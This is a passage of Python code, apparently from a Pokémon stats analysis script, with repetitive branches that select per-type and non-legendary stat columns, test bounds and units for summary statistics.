stat_stats = loaddata.trimmed_flying_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_flying_types['height_m']
stat_stats = loaddata.trimmed_flying_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_flying_types['weight_kg']
stat_stats = loaddata.trimmed_flying_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# poison pokemon
elif type_set == "13":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_poison_types['total_points']
stat_stats = loaddata.trimmed_poison_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_poison_types['hp']
stat_stats = loaddata.trimmed_poison_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_poison_types['speed']
stat_stats = loaddata.trimmed_poison_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_poison_types['attack']
stat_stats = loaddata.trimmed_poison_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_poison_types['defense']
stat_stats = loaddata.trimmed_poison_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_poison_types['sp_attack']
stat_stats = loaddata.trimmed_poison_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_poison_types['sp_defense']
stat_stats = loaddata.trimmed_poison_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_poison_types['height_m']
stat_stats = loaddata.trimmed_poison_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_poison_types['weight_kg']
stat_stats = loaddata.trimmed_poison_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ground pokemon
elif type_set == "14":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_ground_types['total_points']
stat_stats = loaddata.trimmed_ground_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ground_types['hp']
stat_stats = loaddata.trimmed_ground_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ground_types['speed']
stat_stats = loaddata.trimmed_ground_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ground_types['attack']
stat_stats = loaddata.trimmed_ground_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ground_types['defense']
stat_stats = loaddata.trimmed_ground_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ground_types['sp_attack']
stat_stats = loaddata.trimmed_ground_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ground_types['sp_defense']
stat_stats = loaddata.trimmed_ground_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_ground_types['height_m']
stat_stats = loaddata.trimmed_ground_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_ground_types['weight_kg']
stat_stats = loaddata.trimmed_ground_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# rock pokemon
elif type_set == "15":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_rock_types['total_points']
stat_stats = loaddata.trimmed_rock_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_rock_types['hp']
stat_stats = loaddata.trimmed_rock_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_rock_types['speed']
stat_stats = loaddata.trimmed_rock_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_rock_types['attack']
stat_stats = loaddata.trimmed_rock_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_rock_types['defense']
stat_stats = loaddata.trimmed_rock_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_rock_types['sp_attack']
stat_stats = loaddata.trimmed_rock_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_rock_types['sp_defense']
stat_stats = loaddata.trimmed_rock_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_rock_types['height_m']
stat_stats = loaddata.trimmed_rock_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_rock_types['weight_kg']
stat_stats = loaddata.trimmed_rock_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# bug pokemon
elif type_set == "16":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_bug_types['total_points']
stat_stats = loaddata.trimmed_bug_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_bug_types['hp']
stat_stats = loaddata.trimmed_bug_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_bug_types['speed']
stat_stats = loaddata.trimmed_bug_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_bug_types['attack']
stat_stats = loaddata.trimmed_bug_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_bug_types['defense']
stat_stats = loaddata.trimmed_bug_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_bug_types['sp_attack']
stat_stats = loaddata.trimmed_bug_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_bug_types['sp_defense']
stat_stats = loaddata.trimmed_bug_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_bug_types['height_m']
stat_stats = loaddata.trimmed_bug_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_bug_types['weight_kg']
stat_stats = loaddata.trimmed_bug_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ghost pokemon
elif type_set == "17":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_ghost_types['total_points']
stat_stats = loaddata.trimmed_ghost_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ghost_types['hp']
stat_stats = loaddata.trimmed_ghost_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ghost_types['speed']
stat_stats = loaddata.trimmed_ghost_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ghost_types['attack']
stat_stats = loaddata.trimmed_ghost_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ghost_types['defense']
stat_stats = loaddata.trimmed_ghost_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ghost_types['sp_attack']
stat_stats = loaddata.trimmed_ghost_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ghost_types['sp_defense']
stat_stats = loaddata.trimmed_ghost_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_ghost_types['height_m']
stat_stats = loaddata.trimmed_ghost_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_ghost_types['weight_kg']
stat_stats = loaddata.trimmed_ghost_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# steel pokemon
elif type_set == "18":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_steel_types['total_points']
stat_stats = loaddata.trimmed_steel_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_steel_types['hp']
stat_stats = loaddata.trimmed_steel_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_steel_types['speed']
stat_stats = loaddata.trimmed_steel_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_steel_types['attack']
stat_stats = loaddata.trimmed_steel_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_steel_types['defense']
stat_stats = loaddata.trimmed_steel_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_steel_types['sp_attack']
stat_stats = loaddata.trimmed_steel_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_steel_types['sp_defense']
stat_stats = loaddata.trimmed_steel_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_steel_types['height_m']
stat_stats = loaddata.trimmed_steel_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_steel_types['weight_kg']
stat_stats = loaddata.trimmed_steel_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# all pokemon (trimmed h & w)
elif type_set == "19":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_total_points
stat_stats = loaddata.trimmed_total_points_stats
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_hp
stat_stats = loaddata.trimmed_hp_stats
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_speed
stat_stats = loaddata.trimmed_speed_stats
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_attack
stat_stats = loaddata.trimmed_attack_stats
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_defense
stat_stats = loaddata.trimmed_defense_stats
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_sp_attack
stat_stats = loaddata.trimmed_sp_attack_stats
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_sp_defense
stat_stats = loaddata.trimmed_sp_defense_stats
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_height
stat_stats = loaddata.trimmed_height_stats
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_weight
stat_stats = loaddata.trimmed_weight_stats
unit = '(kg)'
else:
return
else:
return
elif data_set == "3": # non legendary pokemon
set_name = "Non Legendary Pokemon"
modifier = '(non legendary)'
if type_set == "1":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_grass_types['total_points']
stat_stats = loaddata.non_legendary_grass_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_grass_types['hp']
stat_stats = loaddata.non_legendary_grass_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_grass_types['speed']
stat_stats = loaddata.non_legendary_grass_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_grass_types['attack']
stat_stats = loaddata.non_legendary_grass_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_grass_types['defense']
stat_stats = loaddata.non_legendary_grass_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_grass_types['sp_attack']
stat_stats = loaddata.non_legendary_grass_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_grass_types['sp_defense']
stat_stats = loaddata.non_legendary_grass_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_grass_types['height_m']
stat_stats = loaddata.non_legendary_grass_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_grass_types['weight_kg']
stat_stats = loaddata.non_legendary_grass_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fire pokemon
elif type_set == "2":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_fire_types['total_points']
stat_stats = loaddata.non_legendary_fire_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fire_types['hp']
stat_stats = loaddata.non_legendary_fire_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fire_types['speed']
stat_stats = loaddata.non_legendary_fire_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fire_types['attack']
stat_stats = loaddata.non_legendary_fire_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fire_types['defense']
stat_stats = loaddata.non_legendary_fire_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fire_types['sp_attack']
stat_stats = loaddata.non_legendary_fire_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fire_types['sp_defense']
stat_stats = loaddata.non_legendary_fire_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_fire_types['height_m']
stat_stats = loaddata.non_legendary_fire_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_fire_types['weight_kg']
stat_stats = loaddata.non_legendary_fire_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# water pokemon
elif type_set == "3":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_water_types['total_points']
stat_stats = loaddata.non_legendary_water_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_water_types['hp']
stat_stats = loaddata.non_legendary_water_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_water_types['speed']
stat_stats = loaddata.non_legendary_water_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_water_types['attack']
stat_stats = loaddata.non_legendary_water_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_water_types['defense']
stat_stats = loaddata.non_legendary_water_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_water_types['sp_attack']
stat_stats = loaddata.non_legendary_water_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_water_types['sp_defense']
stat_stats = loaddata.non_legendary_water_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_water_types['height_m']
stat_stats = loaddata.non_legendary_water_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_water_types['weight_kg']
stat_stats = loaddata.non_legendary_water_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# electric pokemon
elif type_set == "4":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_electric_types['total_points']
stat_stats = loaddata.non_legendary_electric_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_electric_types['hp']
stat_stats = loaddata.non_legendary_electric_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_electric_types['speed']
stat_stats = loaddata.non_legendary_electric_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_electric_types['attack']
stat_stats = loaddata.non_legendary_electric_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_electric_types['defense']
stat_stats = loaddata.non_legendary_electric_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_electric_types['sp_attack']
stat_stats = loaddata.non_legendary_electric_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_electric_types['sp_defense']
stat_stats = loaddata.non_legendary_electric_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_electric_types['height_m']
stat_stats = loaddata.non_legendary_electric_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_electric_types['weight_kg']
stat_stats = loaddata.non_legendary_electric_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# psychic pokemon
elif type_set == "5":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_psychic_types['total_points']
stat_stats = loaddata.non_legendary_psychic_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_psychic_types['hp']
stat_stats = loaddata.non_legendary_psychic_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_psychic_types['speed']
stat_stats = loaddata.non_legendary_psychic_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_psychic_types['attack']
stat_stats = loaddata.non_legendary_psychic_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_psychic_types['defense']
stat_stats = loaddata.non_legendary_psychic_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_psychic_types['sp_attack']
stat_stats = loaddata.non_legendary_psychic_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_psychic_types['sp_defense']
stat_stats = loaddata.non_legendary_psychic_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_psychic_types['height_m']
stat_stats = loaddata.non_legendary_psychic_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_psychic_types['weight_kg']
stat_stats = loaddata.non_legendary_psychic_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ice pokemon
elif type_set == "6":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_ice_types['total_points']
stat_stats = loaddata.non_legendary_ice_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ice_types['hp']
stat_stats = loaddata.non_legendary_ice_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ice_types['speed']
stat_stats = loaddata.non_legendary_ice_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ice_types['attack']
stat_stats = loaddata.non_legendary_ice_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ice_types['defense']
stat_stats = loaddata.non_legendary_ice_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ice_types['sp_attack']
stat_stats = loaddata.non_legendary_ice_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ice_types['sp_defense']
stat_stats = loaddata.non_legendary_ice_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_ice_types['height_m']
stat_stats = loaddata.non_legendary_ice_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_ice_types['weight_kg']
stat_stats = loaddata.non_legendary_ice_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# dragon pokemon
elif type_set == "7":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_dragon_types['total_points']
stat_stats = loaddata.non_legendary_dragon_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_dragon_types['hp']
stat_stats = loaddata.non_legendary_dragon_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_dragon_types['speed']
stat_stats = loaddata.non_legendary_dragon_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_dragon_types['attack']
stat_stats = loaddata.non_legendary_dragon_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_dragon_types['defense']
stat_stats = loaddata.non_legendary_dragon_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_dragon_types['sp_attack']
stat_stats = loaddata.non_legendary_dragon_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_dragon_types['sp_defense']
stat_stats = loaddata.non_legendary_dragon_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_dragon_types['height_m']
stat_stats = loaddata.non_legendary_dragon_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_dragon_types['weight_kg']
stat_stats = loaddata.non_legendary_dragon_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# dark pokemon
elif type_set == "8":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_dark_types['total_points']
stat_stats = loaddata.non_legendary_dark_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_dark_types['hp']
stat_stats = loaddata.non_legendary_dark_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_dark_types['speed']
stat_stats = loaddata.non_legendary_dark_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_dark_types['attack']
stat_stats = loaddata.non_legendary_dark_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_dark_types['defense']
stat_stats = loaddata.non_legendary_dark_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_dark_types['sp_attack']
stat_stats = loaddata.non_legendary_dark_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_dark_types['sp_defense']
stat_stats = loaddata.non_legendary_dark_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_dark_types['height_m']
stat_stats = loaddata.non_legendary_dark_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_dark_types['weight_kg']
stat_stats = loaddata.non_legendary_dark_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fairy pokemon
elif type_set == "9":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_fairy_types['total_points']
stat_stats = loaddata.non_legendary_fairy_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fairy_types['hp']
stat_stats = loaddata.non_legendary_fairy_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fairy_types['speed']
stat_stats = loaddata.non_legendary_fairy_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fairy_types['attack']
stat_stats = loaddata.non_legendary_fairy_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fairy_types['defense']
